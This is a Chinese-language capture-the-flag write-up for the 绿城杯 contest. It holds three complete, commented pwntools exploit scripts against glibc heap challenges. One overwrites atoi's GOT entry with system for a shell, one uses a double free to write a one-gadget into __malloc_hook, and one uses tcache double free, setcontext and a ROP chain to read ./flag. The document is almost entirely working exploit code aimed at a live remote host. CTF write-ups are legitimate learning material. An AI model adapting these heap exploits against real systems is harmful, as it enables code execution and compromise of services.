绿城杯

null_pwn

这个可以溢出一个字节并且没开atoi，用 chunk extend 泄露 libc，再把 atoi 改成 system

from pwn import *

#p = process("./pwn")
#ip: 82.157.5.28
#port: 51204
# Live instance used by the writeup (a local run would use process("./pwn")).
p = remote("82.157.5.28", 51204)
#context.log_level = "debug"

# Every leak offset and symbol lookup below is resolved against this exact
# build; a different glibc produces wrong addresses.
libc = ELF("/lib/x86_64-linux-gnu/libc-2.23.so")

# Same effect as assigning context.arch and context.os one at a time.
context.update(arch="amd64", os="linux")
#gdb.attach(p)

def add(idx,size,con):
    """Menu item 1: allocate slot *idx* with *size* bytes and write *con* into it.

    The content goes out with send(), not sendline(): no newline is appended.
    """
    prompts = (
        ("Your choice :", "1"),
        ("Index:", str(idx)),
        ("Size of Heap : ", str(size)),
    )
    for prompt, reply in prompts:
        p.recvuntil(prompt)
        p.sendline(reply)
    p.recvuntil("Content?:")
    p.send(con)

def free(idx):
    """Menu item 2: release slot *idx*."""
    p.sendlineafter("Your choice :", "2")
    p.sendlineafter("Index:", str(idx))

def edit(idx,con):
    """Menu item 3: overwrite the content of slot *idx* with *con* (raw send, no newline)."""
    p.sendlineafter("Your choice :", "3")
    p.sendlineafter("Index:", str(idx))
    p.sendafter("Content?:", con)

def show(idx):
    """Menu item 4: ask the target to print slot *idx*; the caller reads the reply."""
    choice, index = "4", str(idx)
    p.recvuntil("Your choice :")
    p.sendline(choice)
    p.recvuntil("Index :")
    p.sendline(index)

# NOTE: Python 2 script (the commented "print p.recv()" below is a print
# statement, and str/p64 results are concatenated freely).

# --- stage 1: one-byte overflow -> overlapping chunks -> libc leak ------------
# Five slots allocated back to back; the requested sizes are what the target's
# allocator receives.
add(0,0x28,"a"*0x20)
add(1,0x60,"aaaaa")
add(2,0x68,"ttbjj")#2
add(3,0x40,"etyui")
add(4,0x40,"uuuuu")
# 0x29 bytes written into a 0x28-byte slot: the single-byte overflow named in
# the writeup. The extra byte (0xe1) presumably lands in the size field of the
# next chunk, making chunk 1 look large enough to cover chunk 2 as well.
edit(0,"a"*0x28 + p8(0xe1))
# Free the enlarged chunk and re-allocate it at the original size; show(2)
# then prints from a region the allocator still considers free, so the
# output starts with allocator metadata rather than user content.
free(1)
add(1,0x60,"aaaaa")
show(2)
#print p.recv()

p.recvuntil("Content : ")
# The 6 leaked bytes are treated as main_arena+88 of the libc 2.23 build named
# at the top; "- 88 - 0x10 - __malloc_hook" converts that to the library base.
# The constant is build-specific.
libc_base = u64(p.recv(6).ljust(8,"\x00")) - 88 - 0x10 - libc.sym["__malloc_hook"]
log.info("libc_base: " + hex(libc_base))
sys_ad = libc_base + libc.sym["system"]
atoi = libc_base + libc.sym["atoi"]
log.info("system: " + hex(sys_ad))
log.info("atoi: " + hex(atoi))

# --- stage 2: steer a 0x68 allocation into the binary's data segment ---------
# Slot 5 presumably overlaps chunk 2; after chunk 2 is freed, writing through
# slot 5 replaces the freed chunk's forward pointer with the fixed address
# 0x6020bd (hard-coded, so the binary is presumably not PIE). The following
# add(2, ...) consumes the first free-list entry, and add(6, ...) is then
# served from 0x6020bd.
add(5,0x68,"aaaaa")#5
free(2)
edit(5,p64(0x6020bd))
add(2,0x68,"aaaa")
# Bytes written at that address. Per the writeup this rebuilds the program's
# slot table so that slot 0 points at 0x602068, presumably the GOT entry of
# atoi (confirm against the binary); the two packed words look like
# (size, index) pairs for the existing slots.
payload = "a"*3 + p64(0)*2 + p64(0x0000006000000038) + p64(0x0000004000000000)
payload += p64(0x0000006800000040) + p64(0)*5 + p64(0x602068)
add(6,0x68,payload)
#gdb.attach(p)
# Slot 0 now aliases the GOT entry, so this write replaces atoi with system.
edit(0,p64(sys_ad))

# The next menu input is parsed with atoi() — now system() — so "sh" is run.
p.recvuntil("Your choice :")
p.sendline("sh\x00")
#gdb.attach(p)
p.interactive()

uaf_pwn

直接doublefree,分配到malloc_hook上写og

from pwn import *

#p = process("./uaf_pwn")

# Live instance used by the writeup (process("./uaf_pwn") for a local run).
p = remote("82.157.5.28", 52102)

#context.log_level = "debug"

# Symbol offsets and the one-gadget constant below belong to this exact build.
libc = ELF("/lib/x86_64-linux-gnu/libc-2.23.so")

# Equivalent to assigning context.arch and context.os separately.
context.update(arch="amd64", os="linux")
#gdb.attach(p)

# The target prints a 14-character hexadecimal address before its menu. It is
# only logged; nothing later in this script reads it.
banner = p.recv(14)
stack = int(banner, 16)
log.info("ad: " + hex(stack))

def add(size):
    """Menu item 1: allocate a new chunk of *size* bytes."""
    p.sendlineafter(">", "1")
    p.sendlineafter("size>", str(size))

def free(idx):
    """Menu item 2: release slot *idx*."""
    replies = (("2", ">"), (str(idx), "index>"))
    for reply, prompt in replies:
        p.recvuntil(prompt)
        p.sendline(reply)

def edit(idx,con):
    """Menu item 3: overwrite slot *idx* with *con* (raw send, no newline appended)."""
    p.recvuntil(">")
    p.sendline("3")
    p.sendlineafter("index>", str(idx))
    p.sendafter("content>", con)

def show(idx):
    """Menu item 4: make the target print slot *idx*; the caller parses the output."""
    p.sendlineafter(">", "4")
    p.sendlineafter("index>", str(idx))

# --- libc leak through the use-after-free --------------------------------------
add(0xa0)#0
add(0x10)#1  # presumably a separator so chunk 0 is not merged into the top chunk on free
free(0)
# The target still prints a freed slot (the UAF the writeup names), so the first
# 6 bytes returned are an allocator pointer, not user data.
show(0)
# Interpreted as main_arena+88 of the libc 2.23 build named above and converted
# to the library base; the "88" is build-specific.
libc_base = u64(p.recv(6).ljust(8,"\x00")) - 88 - 0x10 - libc.sym["__malloc_hook"]
malloc_hook = libc_base + libc.sym["__malloc_hook"]
# one-gadget offset for this build; the trailing comment lists the candidates
# the author had available.
og = libc_base + 0x4527a#0x4527a 0xf03a4 0xf1247
log.info("libc_base: " + hex(libc_base))
log.info("malloc_hook: " + hex(malloc_hook))

# --- fastbin double free -> allocation placed over __malloc_hook --------------
add(0xa0)#2
add(0x68)#3
add(0x68)#4
# Slot 3 is freed twice with slot 4 freed in between; the script relies on the
# target's allocator not rejecting the repeated free.
free(3)
free(4)
free(3)
# Slot 5 presumably reuses chunk 3 while it is still queued; the write replaces
# its forward pointer with malloc_hook-0x23 (an address chosen, per the usual
# reasoning for this technique, so that the bytes there pass as a valid size).
add(0x68)#5
edit(5,p64(malloc_hook - 0x23))
# Three more 0x68 allocations drain the queue; the last one is presumably
# served from malloc_hook-0x23.
add(0x68)#6
add(0x68)#7
add(0x68)#8
# 3 + 16 = 0x13 bytes of padding, which with the usual 0x10 chunk header puts
# `og` exactly at __malloc_hook (0x23 - 0x10 = 0x13).
edit(8,"a"*3 + p64(0)*2 + p64(og))
# Any further allocation goes through the hook.
add(0x10)
p.interactive()

GreentownNote

from pwn import *

#context.log_level='debug'

# This script only runs locally; there is no remote target in the writeup.
p = process("./pwn")
elf = ELF('./pwn')  # loaded but not referenced anywhere below
# Gadget offsets and symbols below are tied to this exact glibc 2.27 build.
libc = ELF("/lib/x86_64-linux-gnu/libc-2.27.so")
#context.log_level = "debug"
context.update(os="linux", arch="amd64")

def add(size,con):
    """Menu item 1: allocate a note of *size* bytes and send *con* as its content.

    The content goes out with send(): no trailing newline.
    """
    p.sendlineafter("> Your choice :", "1")
    p.sendlineafter("> Note size :", str(size))
    p.sendafter("> Content :", con)

def show(idx):
    """Menu item 2: make the target print note *idx*; the caller parses the reply."""
    steps = (("> Your choice :", "2"), ("| Index :", str(idx)))
    for prompt, reply in steps:
        p.recvuntil(prompt)
        p.sendline(reply)

def free(idx):
    """Menu item 3: release note *idx*."""
    p.sendlineafter("> Your choice :", "3")
    p.sendlineafter("| Index :", str(idx))

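# NOTE: Python 2 only — str(frame) and the str+p64() concatenations below do
# not work under Python 3 pwntools.

# --- libc leak: repeated frees of one note ------------------------------------
add(0x400,"aaaa")
add(0x400,"bbbb")
# Note 0 is freed eight times in a row (the target evidently does not clear the
# slot). Presumably the first seven fill the tcache bin for this size and the
# eighth lands in the unsorted bin, whose pointers reference main_arena.
for _ in range(8):
    free(0)
add(0x400,"a"*8)#0
free(1)
show(0)
p.recvuntil("a"*8)
# Was a redundant double assignment (`libc_base = libc_base = ...`).
# The 6 bytes after the "a"*8 marker are treated as main_arena+96 of the
# libc 2.27 build named above; "- 96 - 0x10 - __malloc_hook" gives the base.
libc_base = u64(p.recv(6).ljust(8,"\x00")) - 96 - 0x10 - libc.sym["__malloc_hook"]
log.info("libc_base: " + hex(libc_base))
# setcontext+53: entry that loads registers from a frame pointed to by rdi.
setcontext = libc_base + libc.sym["setcontext"] + 53
free_hook = libc_base + libc.sym["__free_hook"]

# --- heap leak: tcache double free ------------------------------------------
add(0x300,"aaaa")#1
# Same note freed twice; relies on the target's allocator not detecting it.
free(1)
free(1)

# One byte overwrites the low byte of the queued chunk's next pointer; showing
# the note then prints a heap pointer.
add(0x300,p8(0x60))
show(1)
p.recvuntil("| Content: ")
heap = u64(p.recv(6).ljust(8,"\x00"))
heap = heap & 0xfffffffffffff000  # round down to a page boundary
log.info("heap: " + hex(heap))

free(1)
free(1)

# ROP gadgets: offsets into this specific libc 2.27 build (not portable).
rdi = 0x000000000002155f + libc_base
rsi = 0x0000000000023e8a + libc_base
rax = 0x0000000000043a78 + libc_base
rdx = 0x0000000000001b96 + libc_base
syscall = 0x00000000000d29d5 + libc_base
ret = 0x00000000000008aa + libc_base

write = libc_base + libc.sym["puts"]  # named "write" but resolves to puts
flag_ad = heap + 0x408  # expected to hold the "./flag" string placed below

# Chain: open(flag_ad, 0) [rax=2] -> read(3, heap+0x100, 0x100) [rax=0]
#        -> puts(heap+0x100). The rax=1 before puts is left over and unused by puts.
payload = p64(rdi) + p64(flag_ad)
payload += p64(rsi) + p64(0)
payload += p64(rax) + p64(2) + p64(syscall)

payload += p64(rdi) + p64(3) + p64(rsi) + p64(heap + 0x100)
payload += p64(rdx) + p64(0x100)
payload += p64(rax) + p64(0) + p64(syscall)

payload += p64(rax) + p64(1)
payload += p64(rdi) + p64(heap + 0x100)
payload += p64(write)

# Register frame consumed by setcontext: pivot rsp to heap+0x360 (where the
# chain is expected to sit) and return into it via a plain ret gadget.
frame = SigreturnFrame()
frame.rsp = heap + 0x360
frame.rip = ret

# First allocation from the doubled entry: redirect the next one to __free_hook.
add(0x300,p64(free_hook))

# Frame + padding + chain + two copies of the path (flag_ad = heap+0x408 must
# land on one of them; re-check the offsets with a debugger if anything moves).
add(0x300,str(frame) + "a"*8 + payload + "./flag\x00\x00" + "./flag\x00\x00")
# This allocation is served from __free_hook; it now holds setcontext+53.
add(0x300,p64(setcontext))

# Freeing the note that holds the frame enters the hook with rdi = that chunk.
free(2)

p.interactive()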